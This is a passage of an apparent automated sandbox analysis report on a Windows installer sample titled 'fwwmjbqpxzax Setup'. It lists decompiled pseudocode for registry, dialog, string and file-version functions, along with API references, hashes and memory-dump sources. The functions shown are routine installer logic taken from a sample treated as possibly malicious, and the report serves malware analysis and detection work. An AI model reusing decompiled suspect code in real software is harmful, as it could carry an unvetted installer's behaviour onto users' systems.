                          • API String ID: 632923820-2449383134
                          • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                          • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}










                          0x00402a38
                          0x00402a49
                          0x00402a51
                          0x00402a79
                          0x00402a60
                          0x00402a63
                          0x00402ab3
                          0x00402ab9
                          0x00402abb
                          0x00000000
                          0x00402abb
                          0x00402a70
                          0x00402a75
                          0x00402a77
                          0x00000000
                          0x00000000
                          0x00402a77
                          0x00402a8e
                          0x00402a96
                          0x00402a9d
                          0x00402ac3
                          0x00402ac9
                          0x00000000
                          0x00000000
                          0x00402ad1
                          0x00402ad7
                          0x00402ad9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ad9
                          0x00000000
                          0x00402aac
                          0x00402ac0

                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                          • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                          0x00401ccb
                          0x00401cd2
                          0x00401d01
                          0x00401d09
                          0x00401d10
                          0x00401d10
                          0x00402880
                          0x0040288c

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                          • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                          0x00404618
                          0x0040461c
                          0x00404624
                          0x00404627
                          0x00404628
                          0x0040462a
                          0x0040462c
                          0x0040462f
                          0x0040462f
                          0x00404636
                          0x0040463c
                          0x0040463c
                          0x00404643
                          0x0040464e
                          0x0040464f
                          0x00404652
                          0x00404652
                          0x0040465f
                          0x0040466a
                          0x0040466d
                          0x0040467f
                          0x00404686
                          0x00404687
                          0x00404696
                          0x004046a6
                          0x004046c2

                          APIs
                          • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                          • wsprintfA.USER32 ref: 004046A6
                          • SetDlgItemTextA.USER32(?,00420498), ref: 004046B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                          • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                          0x00401bb6
                          0x00401bc2
                          0x00401bc5
                          0x00401bce
                          0x00401bce
                          0x00401bd1
                          0x00401bd5
                          0x00401bde
                          0x00401bde
                          0x00401be1
                          0x00401be5
                          0x00401be7
                          0x00401c34
                          0x00401c36
                          0x00401c3f
                          0x00401c47
                          0x00401c4a
                          0x00401c4a
                          0x00401c53
                          0x00000000
                          0x00401be9
                          0x00401bf0
                          0x00401bf2
                          0x00401bfa
                          0x00401bfd
                          0x00401c25
                          0x00401c59
                          0x00401c59
                          0x00401bff
                          0x00401c0d
                          0x00401c15
                          0x00401c18
                          0x00401c18
                          0x00401bfd
                          0x00401c5c
                          0x00401c5f
                          0x00401c65
                          0x00402825
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                          • SendMessageA.USER32 ref: 00401C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                          • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403897 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x8c0fa0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "fwwmjbqpxzax Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x1
						_t27 =  *0x423ec8; // 0x8c114c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x8c1164
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                          0x0040389b
                          0x004038a0
                          0x004038a6
                          0x004038ab
                          0x004038ab
                          0x004038b3
                          0x00000000
                          0x00000000
                          0x004038b5
                          0x004038bb
                          0x004038c3
                          0x004038c5
                          0x004038cb
                          0x004038cb
                          0x004038cd
                          0x004038d9
                          0x00000000
                          0x00000000
                          0x004038dd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004038df
                          0x004038e4
                          0x004038ed
                          0x004038f3
                          0x004038f8
                          0x0040390c
                          0x00403917
                          0x0040392f
                          0x00403935
                          0x0040393a
                          0x00403942
                          0x00403963
                          0x00403963
                          0x00403963
                          0x00403944
                          0x00403946
                          0x00403946
                          0x0040394a
                          0x0040394d
                          0x00403951
                          0x00403951
                          0x00403956
                          0x0040395c
                          0x0040395c
                          0x00000000
                          0x00403946
                          0x004038fa
                          0x004038ff
                          0x00403908
                          0x00403901
                          0x00403901
                          0x00403901
                          0x004038ff

                          APIs
                          • SetWindowTextA.USER32(00000000,fwwmjbqpxzax Setup), ref: 0040392F
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$fwwmjbqpxzax Setup
                          • API String ID: 530164218-2017237357
                          • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                          • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                          0x00405579
                          0x00405590
                          0x00405598
                          0x00405598
                          0x004055a0

                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                          • CharPrevA.USER32(?,00000000), ref: 00405587
                          • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-4017390910
                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004022F5 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}











                          0x004022f6
                          0x004022fb
                          0x00402305
                          0x0040230f
                          0x00402312
                          0x0040231c
                          0x00402322
                          0x0040232c
                          0x00402333
                          0x0040233b
                          0x00402349
                          0x0040234d
                          0x00402358
                          0x00402358
                          0x0040235c
                          0x00402360
                          0x00402366
                          0x0040236b
                          0x0040236b
                          0x0040236f
                          0x0040237b
                          0x0040237b
                          0x00402394
                          0x00402396
                          0x00402396
                          0x00402399
                          0x0040246f
                          0x0040246f
                          0x00402880
                          0x0040288c

                          APIs
                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402333
                          • lstrlenA.KERNEL32(0040A368,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A368,00000000), ref: 0040238C
                          • RegCloseKey.ADVAPI32(?), ref: 0040246F
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID:
                          • API String ID: 1356686001-0
                          • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                          • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                          0x00401ec7
                          0x00401ecf
                          0x00401ed4
                          0x00401ed9
                          0x00401edd
                          0x00401ee0
                          0x00401ee2
                          0x00401ee9
                          0x00401ef2
                          0x00401efa
                          0x00401efd
                          0x00401f12
                          0x00401f18
                          0x00401f2b
                          0x00401f34
                          0x00401f40
                          0x00401f45
                          0x00401f45
                          0x00401f2b
                          0x00401f48
                          0x00401b75
                          0x00401b75
                          0x00401efd
                          0x00402880
                          0x0040288c

                          APIs
                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                          • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
